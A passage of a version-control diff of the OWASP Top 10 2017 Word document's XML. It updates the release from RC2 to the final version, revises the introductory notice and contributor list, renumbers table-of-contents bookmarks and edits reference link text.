+          </w:rPr>
+          <w:t>MITRE Common Weakness Enumeration</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="77"/>
+        </w:numPr>
+        <w:rPr/>
+      </w:pPr>
       <w:hyperlink r:id="rId144">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="InternetLink"/>
           </w:rPr>
-          <w:t>http://cwe.mitre.org/</w:t>
+          <w:t>PCI Security Standards Council</w:t>
         </w:r>
       </w:hyperlink>
     </w:p>
@@ -14875,41 +14871,15 @@
           <w:ilvl w:val="0"/>
           <w:numId w:val="77"/>
         </w:numPr>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>[PCI Security Standards Council - [</w:t>
-      </w:r>
+        <w:spacing w:before="36" w:after="36"/>
+        <w:rPr/>
+      </w:pPr>
       <w:hyperlink r:id="rId145">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="InternetLink"/>
           </w:rPr>
-          <w:t>https://www.pcisecuritystandards.org</w:t>
-        </w:r>
-      </w:hyperlink>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="77"/>
-        </w:numPr>
-        <w:spacing w:before="36" w:after="36"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t xml:space="preserve">[PCI Data Security Standard (DSS) </w:t>
-      </w:r>
-      <w:hyperlink r:id="rId146">
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="InternetLink"/>
-          </w:rPr>
-          <w:t>https://www.pcisecuritystandards.org/document_library</w:t>
+          <w:t>PCI Data Security Standard (DSS)</w:t>
         </w:r>
       </w:hyperlink>
     </w:p>

--- a/2017/OWASP-Top-10-2017-en.docx
+++ b/2017/OWASP-Top-10-2017-en.docx
@@ -57,10 +57,10 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="0" w:name="owasp-top-10-2017-rc2"/>
+      <w:bookmarkStart w:id="0" w:name="owasp-top-10-2017"/>
       <w:bookmarkEnd w:id="0"/>
       <w:r>
-        <w:t>OWASP Top 10 2017 RC2</w:t>
+        <w:t>OWASP Top 10 2017</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -76,17 +76,17 @@
         <w:pStyle w:val="BodyText"/>
       </w:pPr>
       <w:r>
-        <w:t>October 20, 2017</w:t>
+        <w:t>October 22, 2017</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading3"/>
       </w:pPr>
-      <w:bookmarkStart w:id="1" w:name="release-candidate-2"/>
+      <w:bookmarkStart w:id="1" w:name="golden-master-golden-master-post-rc2"/>
       <w:bookmarkEnd w:id="1"/>
       <w:r>
-        <w:t>Release Candidate 2</w:t>
+        <w:t>Golden Master (golden-master, post RC2)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -268,7 +268,7 @@
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
       <w:bookmarkStart w:id="2" w:name="important-notice"/>
-      <w:bookmarkStart w:id="3" w:name="_Toc496378413"/>
+      <w:bookmarkStart w:id="3" w:name="_Toc496437891"/>
       <w:bookmarkEnd w:id="2"/>
       <w:r>
         <w:lastRenderedPageBreak/>
@@ -297,172 +297,127 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="BodyText"/>
-        <w:rPr>
-          <w:color w:val="FF0000"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="FF0000"/>
-        </w:rPr>
-        <w:t>This Word, HTML, and PDF (if exists) is not canonical. Please refer to the Markdown master here:</w:t>
+      </w:pPr>
+      <w:r>
+        <w:t>The first release candidate received a great deal of push back, which caused a leadership change, involving the community in re-evaluating what the OWASP Top 10 is, the methodology, the data collection and analysis, and how we provide transparency and gove</w:t>
+      </w:r>
+      <w:r>
+        <w:t>rnance over the project. Most of all, the push back showed us how much passion the community has for the OWASP Top 10, and thus how critical it is for OWASP to get the Top 10 right for the majority of use cases.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="BodyText"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="77"/>
-        </w:numPr>
-      </w:pPr>
-      <w:hyperlink r:id="rId12" w:history="1">
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-            <w:sz w:val="21"/>
-            <w:szCs w:val="21"/>
-          </w:rPr>
-          <w:t>https://github.com/OWASP/Top10/tree/master/2017/en</w:t>
-        </w:r>
-      </w:hyperlink>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
+      </w:pPr>
+      <w:r>
+        <w:t>We have worked extensively to validate the m</w:t>
+      </w:r>
+      <w:r>
+        <w:t>ethodology, obtained a great deal of data on over 114,000 apps, and obtained qualitative data via survey by 550 community members on the two new categories – insecure deserialization and insufficient logging and monitoring.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="BodyText"/>
       </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="BodyText"/>
-      </w:pPr>
-      <w:r>
-        <w:t>The first release candidate received a great deal of push back, which caused a leadership change, involving the community in re-evaluating what the OWASP Top 10 is, the methodology, the data collection and analysis, and how we provid</w:t>
-      </w:r>
-      <w:bookmarkStart w:id="5" w:name="_GoBack"/>
+      <w:r>
+        <w:t>We strongly urge for any correct</w:t>
+      </w:r>
+      <w:r>
+        <w:t>ions or issues to be logged at GitHub</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="1"/>
+        </w:numPr>
+      </w:pPr>
+      <w:hyperlink r:id="rId12">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t>https://github.com/OWASP/Top10/issues</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="FirstParagraph"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Through public transparency, we provide traceability and ensure that all voices are heard during this final month before pu</w:t>
+      </w:r>
+      <w:r>
+        <w:t>blication.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Andrew van der Stock</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Brian Glas</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Neil Smithline</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Torsten Gigler</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="5" w:name="toc"/>
+      <w:bookmarkStart w:id="6" w:name="_Toc496437892"/>
       <w:bookmarkEnd w:id="5"/>
       <w:r>
-        <w:t>e transparency and gove</w:t>
-      </w:r>
-      <w:r>
-        <w:t>rnance over the project. Most of all, the push back showed us how much passion the community has for the OWASP Top 10, and thus how critical it is for OWASP to get the Top 10 right for the majority of use cases.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="BodyText"/>
-      </w:pPr>
-      <w:r>
-        <w:t>We have worked extensively to validate the m</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ethodology, obtained a great deal of data on over 114,000 apps, and obtained qualitative data via survey by 550 community members on the two new categories – insecure deserialization and insufficient logging and monitoring.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="BodyText"/>
-      </w:pPr>
-      <w:r>
-        <w:t>We strongly urge for any correct</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ions or issues to be logged at GitHub</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="1"/>
-        </w:numPr>
-      </w:pPr>
-      <w:hyperlink r:id="rId13">
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-          </w:rPr>
-          <w:t>https://github.com/OWASP/Top10/issues</w:t>
-        </w:r>
-      </w:hyperlink>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="FirstParagraph"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Through public transparency, we provide traceability and ensure that all voices are heard during this final month before pu</w:t>
-      </w:r>
-      <w:r>
-        <w:t>blication.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="2"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t>Andrew van der Stock</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="2"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t>Brian Glas</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="2"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t>Neil Smithline</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="2"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t>Torsten Gigler</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading1"/>
-      </w:pPr>
-      <w:bookmarkStart w:id="6" w:name="toc"/>
-      <w:bookmarkStart w:id="7" w:name="_Toc496378414"/>
+        <w:lastRenderedPageBreak/>
+        <w:t>TOC</w:t>
+      </w:r>
       <w:bookmarkEnd w:id="6"/>
-      <w:r>
-        <w:lastRenderedPageBreak/>
-        <w:t>Table of Contents</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="7"/>
-    </w:p>
-    <w:p/>
+    </w:p>
+    <w:bookmarkStart w:id="7" w:name="o-about-owasp"/>
+    <w:bookmarkEnd w:id="7"/>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="TOC1"/>
@@ -485,7 +440,7 @@
       <w:r>
         <w:fldChar w:fldCharType="separate"/>
       </w:r>
-      <w:hyperlink w:anchor="_Toc496378413" w:history="1">
+      <w:hyperlink w:anchor="_Toc496437891" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -512,7 +467,7 @@
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
-          <w:instrText xml:space="preserve"> PAGEREF _Toc496378413 \h </w:instrText>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc496437891 \h </w:instrText>
         </w:r>
         <w:r>
           <w:rPr>
@@ -556,13 +511,13 @@
           <w:lang w:eastAsia="ja-JP"/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink w:anchor="_Toc496378414" w:history="1">
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-            <w:noProof/>
-          </w:rPr>
-          <w:t>Table of Contents</w:t>
+      <w:hyperlink w:anchor="_Toc496437892" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>TOC</w:t>
         </w:r>
         <w:r>
           <w:rPr>
@@ -583,7 +538,7 @@
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
-          <w:instrText xml:space="preserve"> PAGEREF _Toc496378414 \h </w:instrText>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc496437892 \h </w:instrText>
         </w:r>
         <w:r>
           <w:rPr>
@@ -627,7 +582,7 @@
           <w:lang w:eastAsia="ja-JP"/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink w:anchor="_Toc496378415" w:history="1">
+      <w:hyperlink w:anchor="_Toc496437893" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -654,7 +609,7 @@
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
-          <w:instrText xml:space="preserve"> PAGEREF _Toc496378415 \h </w:instrText>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc496437893 \h </w:instrText>
         </w:r>
         <w:r>
           <w:rPr>
@@ -698,7 +653,7 @@
           <w:lang w:eastAsia="ja-JP"/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink w:anchor="_Toc496378416" w:history="1">
+      <w:hyperlink w:anchor="_Toc496437894" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -725,7 +680,7 @@
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
-          <w:instrText xml:space="preserve"> PAGEREF _Toc496378416 \h </w:instrText>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc496437894 \h </w:instrText>
         </w:r>
         <w:r>
           <w:rPr>
@@ -769,7 +724,7 @@
           <w:lang w:eastAsia="ja-JP"/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink w:anchor="_Toc496378417" w:history="1">
+      <w:hyperlink w:anchor="_Toc496437895" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -796,7 +751,7 @@
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
-          <w:instrText xml:space="preserve"> PAGEREF _Toc496378417 \h </w:instrText>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc496437895 \h </w:instrText>
         </w:r>
         <w:r>
           <w:rPr>
@@ -840,7 +795,7 @@
           <w:lang w:eastAsia="ja-JP"/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink w:anchor="_Toc496378418" w:history="1">
+      <w:hyperlink w:anchor="_Toc496437896" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -867,7 +822,7 @@
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
-          <w:instrText xml:space="preserve"> PAGEREF _Toc496378418 \h </w:instrText>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc496437896 \h </w:instrText>
         </w:r>
         <w:r>
           <w:rPr>
@@ -911,13 +866,13 @@
           <w:lang w:eastAsia="ja-JP"/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink w:anchor="_Toc496378419" w:history="1">
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-            <w:noProof/>
-          </w:rPr>
-          <w:t>T10 OWASP Top 10 Application Security Risks – 2017</w:t>
+      <w:hyperlink w:anchor="_Toc496437897" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>T10 OWASP Top 10 2017 Application Security Risks</w:t>
         </w:r>
         <w:r>
           <w:rPr>
@@ -938,7 +893,7 @@
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
-          <w:instrText xml:space="preserve"> PAGEREF _Toc496378419 \h </w:instrText>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc496437897 \h </w:instrText>
         </w:r>
         <w:r>
           <w:rPr>
@@ -982,7 +937,7 @@
           <w:lang w:eastAsia="ja-JP"/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink w:anchor="_Toc496378420" w:history="1">
+      <w:hyperlink w:anchor="_Toc496437898" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -1009,7 +964,7 @@
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
-          <w:instrText xml:space="preserve"> PAGEREF _Toc496378420 \h </w:instrText>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc496437898 \h </w:instrText>
         </w:r>
         <w:r>
           <w:rPr>
@@ -1053,7 +1008,7 @@
           <w:lang w:eastAsia="ja-JP"/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink w:anchor="_Toc496378421" w:history="1">
+      <w:hyperlink w:anchor="_Toc496437899" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -1080,7 +1035,7 @@
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
-          <w:instrText xml:space="preserve"> PAGEREF _Toc496378421 \h </w:instrText>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc496437899 \h </w:instrText>
         </w:r>
         <w:r>
           <w:rPr>
@@ -1124,7 +1079,7 @@
           <w:lang w:eastAsia="ja-JP"/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink w:anchor="_Toc496378422" w:history="1">
+      <w:hyperlink w:anchor="_Toc496437900" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -1151,7 +1106,7 @@
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
-          <w:instrText xml:space="preserve"> PAGEREF _Toc496378422 \h </w:instrText>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc496437900 \h </w:instrText>
         </w:r>
         <w:r>
           <w:rPr>
@@ -1195,7 +1150,7 @@
           <w:lang w:eastAsia="ja-JP"/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink w:anchor="_Toc496378423" w:history="1">
+      <w:hyperlink w:anchor="_Toc496437901" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -1222,7 +1177,7 @@
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
-          <w:instrText xml:space="preserve"> PAGEREF _Toc496378423 \h </w:instrText>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc496437901 \h </w:instrText>
         </w:r>
         <w:r>
           <w:rPr>
@@ -1266,7 +1221,7 @@
           <w:lang w:eastAsia="ja-JP"/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink w:anchor="_Toc496378424" w:history="1">
+      <w:hyperlink w:anchor="_Toc496437902" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -1293,7 +1248,7 @@
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
-          <w:instrText xml:space="preserve"> PAGEREF _Toc496378424 \h </w:instrText>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc496437902 \h </w:instrText>
         </w:r>
         <w:r>
           <w:rPr>
@@ -1337,7 +1292,7 @@
           <w:lang w:eastAsia="ja-JP"/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink w:anchor="_Toc496378425" w:history="1">
+      <w:hyperlink w:anchor="_Toc496437903" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -1364,7 +1319,7 @@
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
-          <w:instrText xml:space="preserve"> PAGEREF _Toc496378425 \h </w:instrText>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc496437903 \h </w:instrText>
         </w:r>
         <w:r>
           <w:rPr>
@@ -1408,7 +1363,7 @@
           <w:lang w:eastAsia="ja-JP"/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink w:anchor="_Toc496378426" w:history="1">
+      <w:hyperlink w:anchor="_Toc496437904" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -1435,7 +1390,7 @@
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
-          <w:instrText xml:space="preserve"> PAGEREF _Toc496378426 \h </w:instrText>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc496437904 \h </w:instrText>
         </w:r>
         <w:r>
           <w:rPr>
@@ -1479,7 +1434,7 @@
           <w:lang w:eastAsia="ja-JP"/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink w:anchor="_Toc496378427" w:history="1">
+      <w:hyperlink w:anchor="_Toc496437905" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -1506,7 +1461,7 @@
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
-          <w:instrText xml:space="preserve"> PAGEREF _Toc496378427 \h </w:instrText>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc496437905 \h </w:instrText>
         </w:r>
         <w:r>
           <w:rPr>
@@ -1550,7 +1505,7 @@
           <w:lang w:eastAsia="ja-JP"/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink w:anchor="_Toc496378428" w:history="1">
+      <w:hyperlink w:anchor="_Toc496437906" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -1577,7 +1532,7 @@
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
-          <w:instrText xml:space="preserve"> PAGEREF _Toc496378428 \h </w:instrText>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc496437906 \h </w:instrText>
         </w:r>
         <w:r>
           <w:rPr>
@@ -1621,7 +1576,7 @@
           <w:lang w:eastAsia="ja-JP"/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink w:anchor="_Toc496378429" w:history="1">
+      <w:hyperlink w:anchor="_Toc496437907" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -1648,7 +1603,7 @@
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
-          <w:instrText xml:space="preserve"> PAGEREF _Toc496378429 \h </w:instrText>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc496437907 \h </w:instrText>
         </w:r>
         <w:r>
           <w:rPr>
@@ -1692,7 +1647,7 @@
           <w:lang w:eastAsia="ja-JP"/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink w:anchor="_Toc496378430" w:history="1">
+      <w:hyperlink w:anchor="_Toc496437908" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -1719,7 +1674,7 @@
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
-          <w:instrText xml:space="preserve"> PAGEREF _Toc496378430 \h </w:instrText>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc496437908 \h </w:instrText>
         </w:r>
         <w:r>
           <w:rPr>
@@ -1763,7 +1718,7 @@
           <w:lang w:eastAsia="ja-JP"/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink w:anchor="_Toc496378431" w:history="1">
+      <w:hyperlink w:anchor="_Toc496437909" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -1790,7 +1745,7 @@
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
-          <w:instrText xml:space="preserve"> PAGEREF _Toc496378431 \h </w:instrText>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc496437909 \h </w:instrText>
         </w:r>
         <w:r>
           <w:rPr>
@@ -1834,7 +1789,7 @@
           <w:lang w:eastAsia="ja-JP"/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink w:anchor="_Toc496378432" w:history="1">
+      <w:hyperlink w:anchor="_Toc496437910" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -1861,7 +1816,7 @@
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
-          <w:instrText xml:space="preserve"> PAGEREF _Toc496378432 \h </w:instrText>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc496437910 \h </w:instrText>
         </w:r>
         <w:r>
           <w:rPr>
@@ -1905,7 +1860,7 @@
           <w:lang w:eastAsia="ja-JP"/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink w:anchor="_Toc496378433" w:history="1">
+      <w:hyperlink w:anchor="_Toc496437911" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -1932,7 +1887,7 @@
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
-          <w:instrText xml:space="preserve"> PAGEREF _Toc496378433 \h </w:instrText>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc496437911 \h </w:instrText>
         </w:r>
         <w:r>
           <w:rPr>
@@ -1976,7 +1931,7 @@
           <w:lang w:eastAsia="ja-JP"/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink w:anchor="_Toc496378434" w:history="1">
+      <w:hyperlink w:anchor="_Toc496437912" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -2003,7 +1958,7 @@
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
-          <w:instrText xml:space="preserve"> PAGEREF _Toc496378434 \h </w:instrText>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc496437912 \h </w:instrText>
         </w:r>
         <w:r>
           <w:rPr>
@@ -2047,7 +2002,7 @@
           <w:lang w:eastAsia="ja-JP"/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink w:anchor="_Toc496378435" w:history="1">
+      <w:hyperlink w:anchor="_Toc496437913" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -2074,7 +2029,7 @@
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
-          <w:instrText xml:space="preserve"> PAGEREF _Toc496378435 \h </w:instrText>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc496437913 \h </w:instrText>
         </w:r>
         <w:r>
           <w:rPr>
@@ -2118,7 +2073,7 @@
           <w:lang w:eastAsia="ja-JP"/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink w:anchor="_Toc496378436" w:history="1">
+      <w:hyperlink w:anchor="_Toc496437914" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -2145,7 +2100,7 @@
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
-          <w:instrText xml:space="preserve"> PAGEREF _Toc496378436 \h </w:instrText>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc496437914 \h </w:instrText>
         </w:r>
         <w:r>
           <w:rPr>
@@ -2189,7 +2144,7 @@
           <w:lang w:eastAsia="ja-JP"/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink w:anchor="_Toc496378437" w:history="1">
+      <w:hyperlink w:anchor="_Toc496437915" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -2216,7 +2171,7 @@
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
-          <w:instrText xml:space="preserve"> PAGEREF _Toc496378437 \h </w:instrText>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc496437915 \h </w:instrText>
         </w:r>
         <w:r>
           <w:rPr>
@@ -2260,7 +2215,7 @@
           <w:lang w:eastAsia="ja-JP"/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink w:anchor="_Toc496378438" w:history="1">
+      <w:hyperlink w:anchor="_Toc496437916" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -2287,7 +2242,7 @@
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
-          <w:instrText xml:space="preserve"> PAGEREF _Toc496378438 \h </w:instrText>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc496437916 \h </w:instrText>
         </w:r>
         <w:r>
           <w:rPr>
@@ -2319,22 +2274,26 @@
       </w:hyperlink>
     </w:p>
     <w:p>
-      <w:r>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:fldChar w:fldCharType="end"/>
       </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading1"/>
-      </w:pPr>
-      <w:bookmarkStart w:id="8" w:name="o-about-owasp"/>
-      <w:bookmarkStart w:id="9" w:name="_Toc496378415"/>
+      <w:bookmarkStart w:id="8" w:name="_Toc496437893"/>
+      <w:bookmarkStart w:id="9" w:name="_GoBack"/>
+      <w:bookmarkEnd w:id="9"/>
+      <w:r>
+        <w:t>O About OWASP</w:t>
+      </w:r>
       <w:bookmarkEnd w:id="8"/>
-      <w:r>
-        <w:lastRenderedPageBreak/>
-        <w:t>O About OWASP</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="9"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2480,7 +2439,7 @@
       <w:r>
